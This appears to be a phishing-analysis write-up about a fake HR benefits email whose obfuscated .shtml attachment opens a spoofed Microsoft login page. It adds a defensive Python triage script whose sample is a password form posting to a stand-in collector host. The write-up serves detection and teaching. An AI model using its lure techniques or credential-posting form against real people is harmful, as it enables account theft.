In this attack, the initial email posed as an internal company announcement from the human resources department about the release of information regarding a new employee benefit package. The message stated that the new benefit package was available for review and the recipient was asked to review the policy changes in an attached file named “Employee Docs.shtml.” 

To pressure action, the message indicated the recipient must immediately sign the attached document to acknowledge that they’ve reviewed the new handbook. Included in the email was an otherwise unnecessary sentence, added to increase credibility, that said, “The purpose of this policy is to maintain a compensation philosophy that is competitive and financially responsible while supporting service delivery, recruitment and retention of employees at [company name].”

The email was sent from a likely compromised external account unrelated to the target organization. The sender’s display name was set to the name of the target company rather than an employee, which made the message look like it was generated by an automated internal system.

Benefit Package Credential Phishing Email

Had the recipient opened the attached file, a local copy of a phishing page that mimicked a Microsoft login page would have been opened in their browser and pre-populated with their company email address. The login prompt included a message stating that because the recipient was accessing sensitive information, they needed to verify their account password to authenticate their identity. The source code of the SHTML attachment was obfuscated with JavaScript to prevent easy analysis of the file.

Benefit Package Credential Phishing Page
Obfuscated Phishing Attachment Code

How Does This Attack Bypass Email Defenses?

Because this email was sent from a legitimate account that had been compromised and had no history of abuse, there are no direct signals indicating the email’s origin is malicious. IOCs associated with the HTML attachment, such as the file hash, had not been previously detected as malicious, allowing it to bypass traditional tools that rely on known bad indicators. Because the source code of the attached file had been obfuscated, an analysis of the file to identify malicious artifacts, such as URLs, could not be performed.

How Can This Attack Be Detected?

The sender’s display name resembled a human resources account; however, the email address had never been used to communicate with employees at the company. The use of obfuscated source code is a common tactic in phishing attacks. Additionally, an in-depth analysis of files, rather than simply scanning raw source code, could result in the identification of malicious artifacts. HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself.
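The checks described above can be combined into a single triage pass. The following Python sketch is an added example, not code from the original write-up or from any vendor product: it statically unwraps nested decoder calls in an HTML attachment, then reports what only becomes visible after decoding, along with the display-name and first-time-sender signals. The function names, the pattern list, the finding labels and the sample data are all assumptions made for illustration.

```python
import base64
import re
from urllib.parse import quote, unquote

# Heuristic patterns (assumptions for this example, not a complete list).
DECODERS = re.compile(r"\b(unescape|decodeURIComponent|atob)\s*\(\s*(['\"])(.+?)\2\s*\)", re.S)
PASSWORD_FIELD = re.compile(r"<input[^>]+type\s*=\s*['\"]?password", re.I)
URL = re.compile(r"https?://[^\s'\"<>]+", re.I)

# Constructed sample: a harmless form, percent-encoded and then base64-wrapped.
_FORM = '<form action="https://collector.example/post"><input type="password"></form>'
_INNER = "document.write(unescape('%s'))" % quote(_FORM)
SAMPLE = "<script>document.write(atob('%s'))</script>" % base64.b64encode(_INNER.encode()).decode()

def decode_layers(source, max_depth=5):
    """Statically unwrap nested decoder string literals; return every layer found."""
    layers = [source]
    for _ in range(max_depth):
        decoded = []
        for func, _quote, payload in DECODERS.findall(layers[-1]):
            try:
                if func == "atob":
                    decoded.append(base64.b64decode(payload, validate=True).decode("utf-8", "replace"))
                else:
                    decoded.append(unquote(payload))
            except ValueError:  # invalid base64: leave for manual review
                continue
        if not decoded:
            break
        layers.append("\n".join(decoded))
    return layers

def triage(filename, source, display_name, sender_addr, org_name, known_senders):
    """Return heuristic findings for one message carrying an HTML-type attachment."""
    findings, layers = [], decode_layers(source)
    if filename.lower().endswith((".htm", ".html", ".shtml")):
        findings.append("html_attachment")
    if len(layers) > 1:
        findings.append(f"obfuscated_layers={len(layers) - 1}")
    if not PASSWORD_FIELD.search(source) and any(PASSWORD_FIELD.search(l) for l in layers[1:]):
        findings.append("password_field_hidden_in_decoded_layer")
    hidden = {u for l in layers[1:] for u in URL.findall(l)} - set(URL.findall(source))
    findings += [f"hidden_url={u}" for u in sorted(hidden)]
    domain = sender_addr.rsplit("@", 1)[-1].lower()
    if org_name.lower() in display_name.lower() and org_name.lower() not in domain:
        findings.append("display_name_claims_org_from_external_domain")
    if sender_addr.lower() not in known_senders:
        findings.append("first_time_sender")
    return findings
```

Static unwrapping only covers string literals passed directly to the listed decoders; attachments that build their payload at runtime still need rendering in an isolated sandbox.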

What are the Risks of This Attack?

The theme of this email–a human resources announcement–may result in a higher success rate since it will likely be of greater interest to targeted employees. The email also included a direct request for the recipient to review and sign the attached document. Direct requests, rather than passive comments, are generally more effective at getting a target to perform a desired action. If an employee entered credentials into the phishing page, attackers would have full access to their email account, which they can then use to look for sensitive information or as a launch point for other attacks on the employee’s coworkers, customers, or vendors.

Analysis Overview

Vector: Payload-based

Goal: Credential Theft

Tactic: External Compromised Account; File Source Code Obfuscation

Theme: Fake Document; Human Resources Announcement

Impersonated Party: Internal System
